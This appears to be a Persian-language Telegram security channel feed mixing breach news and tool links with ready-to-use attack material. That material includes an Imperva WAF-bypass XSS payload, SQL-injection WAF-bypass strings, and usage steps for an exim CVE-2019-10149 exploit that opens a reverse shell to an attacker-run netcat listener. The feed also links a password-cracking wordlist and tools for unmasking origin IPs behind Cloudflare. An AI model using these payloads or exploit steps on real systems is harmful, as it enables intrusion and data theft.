امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد

https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py


برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.



#web
#bugbounty
#subdomain


@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.


https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/


#news
#breach
#usa


@sec_nerd
ارسال بیش از ۵۰ هزار کاراکتر در پارامترهای POST

استفاده از مقادیری که عدد اویلر (e) دارند


#sqli
#bugbounty
#web
#pentest


@sec_nerd
اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.

در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.


اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/


#breach
#adobe
#news


@sec_nerd
imperva WAF bypass

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click


#waf
#bugbounty
#imperva


@sec_nerd
رحلت پیامبر اکرم(ص) و شهادت امام حسن مجتبی (ع) را تسلیت عرض می نماییم.


@sec_nerd
وردلیست ۸ گیگابایتی مناسب برای کرک هش

https://gofile.io/?c=NHXEGm

حجم کمپرس شده 2.7 گیگ



#hash
#crack


@sec_nerd
exploit.py
2.2 KB
انتشار اکسپلویت اجرای دستور از راه دور بر روی سرویس exim با شناسه CVE-2019-10149

نسخه های آسیب پذیر: از 4.87 تا 4.91

کارکرد:

روی سرور مهاجم netcat به این صورت:
nc -lvp 9000

و اجرای اسکریپت:

python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000



https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit

@sec_nerd
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
پیشرفت رباتیک و هوش مصنوعی در کارخانه بوستون داینامیکز
#ai

@sec_nerd
۵ روز پیش سرویس ابری آمازون هدف حملات گسترده DDOS از سوی عوامل ناشناخته قرار گرفت.
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.



منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/


#news
#amazon
#ddos


@sec_nerd
رایت آپ اجرای دستور (RCE) با استفاده از آسیب پذیری Directory Traversal


https://incogbyte.github.io/pathtraversal/



#writeup
#web
#pentest
#rce


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
🏴 فرارسیدن سالروز شهادت امام رضا (ع) تسلیت باد.


@sec_nerd
راهکارهای پیدا کردن آی پی واقعی وبسایتهایی که از Cloudflare استفاده میکنند + ۲ ابزار برای این کار


https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/



ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare



#web
#pentest
#Cloudflare


@sec_nerd
Some MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

#SQLi #bypass #bugbountytip


@sec_nerd